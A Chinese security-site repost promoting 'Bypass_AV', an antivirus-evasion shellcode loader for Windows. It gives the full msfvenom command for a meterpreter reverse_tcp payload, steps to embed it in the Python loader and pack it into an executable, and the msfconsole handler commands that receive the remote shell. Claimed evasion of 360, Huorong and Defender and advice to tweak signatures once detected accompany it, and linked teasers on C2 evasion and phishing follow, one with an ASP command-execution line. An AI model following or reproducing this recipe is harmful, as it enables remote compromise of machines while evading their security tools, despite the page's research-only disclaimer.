<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    免殺ShellCode加載器 ,360、火絨、Windows Defender

    VSole2022-08-29 06:37:55

    Bypass_AV msf免殺,ShellCode免殺加載器 ,免殺shellcode執行程序 ,360&火絨&Windows Defender

    代碼夠簡單,估計要不了多久就進特征庫了,被殺了再去改幾個特征碼照樣又可以免殺,作者的github保持更新,可以去瞅瞅。

    項目地址:https://github.com/Axx8/Bypass_AV

    環境

    2022年5月8日 測試可以免殺國內殺軟 火絨&360及Windows Defender
Windows 10 64位 360&火絨&Windows Defender
Windows 7 64位 或以上操作系統應該都沒問題(沒有測試)

    該項目僅供網絡安全研究使用,禁止使用該項目進行違法操作,否則自行承擔后果,請各位遵守《中華人民共和國網絡安全法》!!!

    代碼未經過大量測試,如發現問題請提交 issue。

    使用msfvenom

    生成ShellCode

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

    注意:ShellCode 需要是64位的

    加載器

    將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處

    注意:保留原始ShellCode 里的雙引號 "

    示例:

    最終格式:

    打包成可執行程序

    編譯

    Python 3.8.6

    pyinstaller 4.7

    pip install pyinstaller 
pyinstaller -F -w Bypss_AV.py

    生成Bypass_AV.exe在dist目錄中

    運行監聽

    msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

    Bypass_360視頻

    https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov

    Bypass_火絨視頻

    https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov

    Bypass_Windows Defender視頻

    https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov

    免殺火絨
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Shellcodeloader火絨
    2022-03-28 22:38:49
    今天腦子里面蹦出來個想法,殺木馬然后cs上線,本來想讓cs與msf聯動的,但是出了點小問題,還是先研究火絨吧。
    C++內存加密動態defender
    2023-05-12 09:07:32
    前言一種規避軟檢測的技術就是內存加密技術。最后,在實現內存加密的過程中,也發現了其中不足并提出改進的方法。它允許應用程序攔截并處理Windows消息或指定事件,當指定的消息發出后,hook程序就可以在消息到達目標窗口之前將其捕獲,從而得到對消息的控制權,進而可以對該消息進行處理或修改,加入我們所需的功能。IRP hook,一種內核層的hook技術,通過修改IRP結構體中某個成員變量指向自己的補丁函數來實現。
    工具 -- Bypass_AV?【文末抽獎】
    2022-08-16 22:02:56
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender。代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,保持更新。
    釣魚常用手法總結
    2022-03-24 13:48:29
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    CS姿勢
    2022-08-02 16:42:30
    花指令,在程序 shellcode 或特征代碼區域增添垃圾指令,增加的垃圾指令不會影響文件執行,在動態查殺或者文件hash對比是校驗會不一致。加殼,比如upx加殼等,一般文件落地后對比哈希值也可繞過軟。二次編譯,一般用于對shellcode進行二次編譯bypass軟。安裝火絨,查殺CS上線加殼另外再加殼測試。賽門鐵克也未報毒,其它軟不放圖了。
    |白加黑的初步探究
    2023-04-24 09:42:18
    0X01起源在攻防演練中通過運行惡意代碼連接C2是最常用的手段,但是由于對抗程度的提升。以360、天擎為代表的殺毒軟件針對信任鏈的檢測,已經變得愈來愈成熟。這里我們可以理解為,攻擊者通過利用"白加黑"這種攻擊方法。當攻擊者通過社工釣魚的手段,使得目標下載惡意的文件到目標自己的計算機上,并點擊運行白文件時,該文件會在運行時執行惡意DLL。
    Windows通用shellcode生成器
    2023-08-17 09:07:26
    Windows通用shellcode生成器,能夠繞過Microsoft Defender、360、火絨、Panda等軟的查殺。
    常用滲透腳本的特征方式
    2022-09-17 09:21:59
    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。0x02 ASP執行命令腳本這個腳本會被網站安全狗查殺,特征:Shell.Application,當Wscript.shell組件被卸載不可用時就會提示:[Err] ActiveX 部件不能創建對象,這時可嘗試用這個組件來執行命令。<%Set SA = CreateObjectSA.ShellExecute "cmd.exe"," /c set > C:\NpointSoft\npointhost2.2.0\web\1.txt","C:\NpointSoft\npointhost2.2.0\web","",0%>
    無視軟使用遠控橫向小技巧
    2022-06-30 09:12:14
    服務器裝了多個軟,上線之后很多操作也受限,這時候可能比較好的解決方法就是使用自己研發的遠控,……
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类